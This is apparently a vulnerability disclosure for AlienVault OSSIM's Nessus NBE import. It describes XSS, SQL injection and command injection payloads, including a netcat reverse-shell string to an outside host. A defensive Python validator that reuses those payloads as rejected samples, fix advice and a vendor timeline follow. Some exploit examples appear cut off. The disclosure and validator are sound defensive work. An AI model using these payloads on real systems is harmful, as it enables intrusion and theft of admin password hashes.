AlienVault OSSIM is an open source SIEM solution designed to collect and correlate log data. The vulnerability management section of the UI allows a user to upload a Nessus scan in NBE format. Using a specially crafted NBE file, a user can exploit multiple vulnerabilities: XSS, SQLi, and command execution. Authentication is required to exploit these vulnerabilities, but admin privileges are not; any user with access to the Vulnerabilities page can perform these attacks.
* Tested on 4.14, 4.15, and 5.0. It likely affects all previous versions as well.
* Fix: upcoming 5.0.2 release
Various fields within the NBE file can be manipulated to exploit certain vulnerabilities. A pretty bare template that I used to test these issues looked something like this:
timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||184.108.40.206|host_start|Thu Dec 11 17:00:52 2014|
results|220.127.116.11|18.104.22.168|cifs (445/tcp)|1234|Security Hole|Synopsis :\n\nThe remote host contains a web browser that is affected by multiple vulnerabilities.\nOther references :
timestamps||22.214.171.124|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
The hostname/IP portion of the NBE import is vulnerable. Putting <script>alert(0)</script> directly after the hostname/IP in the NBE
The plugin ID portion of the NBE is vulnerable.
Adding to the plugin ID in the
NBE will result in the script being executed every time someone views
the HTML report in the OSSIM interface.
Blind SQL Injection
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
The protocol portion of the NBE is vulnerable to SQL injection.
And turn it to this:
That will result in the hash of the admin password being included in
the report. The extra '(' in '1(' is required to balance the closing ')'
so that the Perl script that runs the import does not error out.
The hostname/IP portion of the NBE is vulnerable. Adding '#&&nc -c
/bin/sh 10.10.10.10 4444&&' will result in a reverse shell as www-data
(the web server user). The initial # is required to comment out the
remainder of a SQL query that comes before the dig command where this
is injected. Without it the script won't proceed to the point where
the dig command runs.
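The common root of every finding above is that NBE fields are trusted as-is: the host ends up in a SQL query and in a dig command line, the plugin ID and port/protocol end up in SQL, and the host is echoed into the HTML report. As an added example (not OSSIM's import code, and not from the advisory's author), the validator below allowlists each field of the two record types in the template above before anything reaches a query or a shell. It assumes the field layout shown (subnet, host, port/protocol, plugin ID, severity, description for results records; subnet, host, event, time for timestamps records) and constructs its own sample records, including ones shaped like the XSS, SQLi and command-injection payloads described, so the shapes of those payloads are assumptions where the post did not preserve them.

```python
"""Strict allowlist validator for Nessus NBE records before import.

Added example, not OSSIM's own importer. Every field is matched against a
narrow grammar so that markup, SQL metacharacters and shell metacharacters
are rejected up front rather than interpolated into a query or a command.
"""
import ipaddress
import re
from datetime import datetime


class NbeError(ValueError):
    """Raised for any record that does not match the strict NBE grammar."""


# Field grammars (assumed from the NBE layout shown in the advisory's template).
SUBNET_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){0,3}$")          # e.g. 192.0.2
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
PORT_RE = re.compile(                                           # e.g. "cifs (445/tcp)"
    r"^(?:[A-Za-z0-9_?.-]+ \(\d{1,5}/(?:tcp|udp|icmp)\)|general/(?:tcp|udp|icmp))$")
PLUGIN_ID_RE = re.compile(r"^\d{1,7}$")
SEVERITIES = {"Security Hole", "Security Warning", "Security Note"}
EVENTS = {"scan_start", "scan_end", "host_start", "host_end"}
TIME_FMT = "%a %b %d %H:%M:%S %Y"                               # Thu Dec 11 17:00:51 2014


def _subnet(value):
    if value == "":
        return value
    if SUBNET_RE.match(value) and all(int(o) <= 255 for o in value.split(".")):
        return value
    raise NbeError(f"bad subnet {value!r}")


def _host(value, required):
    """Accept an IP literal or a DNS hostname; nothing else (no '<', ''', '&', '#')."""
    if value == "" and not required:
        return value
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if len(value) <= 253 and HOSTNAME_RE.match(value):
        return value
    raise NbeError(f"bad host {value!r}")


def _time(value):
    try:
        datetime.strptime(value, TIME_FMT)
    except ValueError:
        raise NbeError(f"bad timestamp {value!r}") from None
    return value


def parse_record(line):
    kind, _, rest = line.partition("|")
    if kind == "timestamps":
        parts = rest.split("|")                    # subnet|host|event|time|
        if len(parts) != 5 or parts[4] != "":
            raise NbeError(f"timestamps record has {len(parts)} fields")
        subnet, host, event, when, _ = parts
        if event not in EVENTS:
            raise NbeError(f"bad event {event!r}")
        return {"type": kind, "subnet": _subnet(subnet),
                "host": _host(host, required=event.startswith("host_")),
                "event": event, "time": _time(when)}
    if kind == "results":
        parts = rest.split("|", 5)                 # description may contain '|'
        if len(parts) != 6:
            raise NbeError("results record is missing fields")
        subnet, host, port, plugin_id, severity, description = parts
        if not PORT_RE.match(port):
            raise NbeError(f"bad port/protocol {port!r}")
        if not PLUGIN_ID_RE.match(plugin_id):
            raise NbeError(f"bad plugin id {plugin_id!r}")
        if severity not in SEVERITIES:
            raise NbeError(f"bad severity {severity!r}")
        return {"type": kind, "subnet": _subnet(subnet), "host": _host(host, True),
                "port": port, "plugin_id": int(plugin_id), "severity": severity,
                "description": description}
    raise NbeError(f"unknown record type {kind!r}")


def parse_nbe(text):
    """Return parsed records, or raise NbeError naming the first bad line."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip():
            try:
                records.append(parse_record(line))
            except NbeError as exc:
                raise NbeError(f"line {lineno}: {exc}") from None
    return records


def rejection(text):
    """Return the validator's error message for text, or None if accepted."""
    try:
        parse_nbe(text)
    except NbeError as exc:
        return str(exc)
    return None


# Constructed samples: the advisory's clean template (documentation IPs
# substituted) and records carrying the payload shapes it describes.
CLEAN_NBE = r"""timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||192.0.2.10|host_start|Thu Dec 11 17:00:52 2014|
results|192.0.2|192.0.2.10|cifs (445/tcp)|1234|Security Hole|Synopsis :\n\nThe remote host contains a web browser that is affected by multiple vulnerabilities.\nOther references :
timestamps||192.0.2.10|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
"""
XSS_HOST = r"results|192.0.2|192.0.2.10<script>alert(0)</script>|cifs (445/tcp)|1234|Security Hole|x"
SQLI_PLUGIN = r"results|192.0.2|192.0.2.10|cifs (445/tcp)|1234' UNION SELECT SLEEP(20) AND '1'='1|Security Hole|x"
SQLI_PROTO = r"results|192.0.2|192.0.2.10|cifs (445/tcp') UNION SELECT 1 WHERE '1(|1234|Security Hole|x"  # assumed shape
CMD_HOST = r"results|192.0.2|192.0.2.10'#&&nc -c /bin/sh 10.10.10.10 4444&&|cifs (445/tcp)|1234|Security Hole|x"

if __name__ == "__main__":
    print(len(parse_nbe(CLEAN_NBE)), "clean records accepted")
    for sample in (XSS_HOST, SQLI_PLUGIN, SQLI_PROTO, CMD_HOST):
        print("rejected:", rejection(sample))
```

Input validation like this is a defence-in-depth layer, not a substitute for the real fixes: the importer should bind host, plugin ID and protocol as query parameters rather than interpolating them, invoke dig with an argument list rather than a shell string, and HTML-encode the host when rendering the report.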
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the
issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent
to release the details. No response.
05/05/2015 - Released details to FD.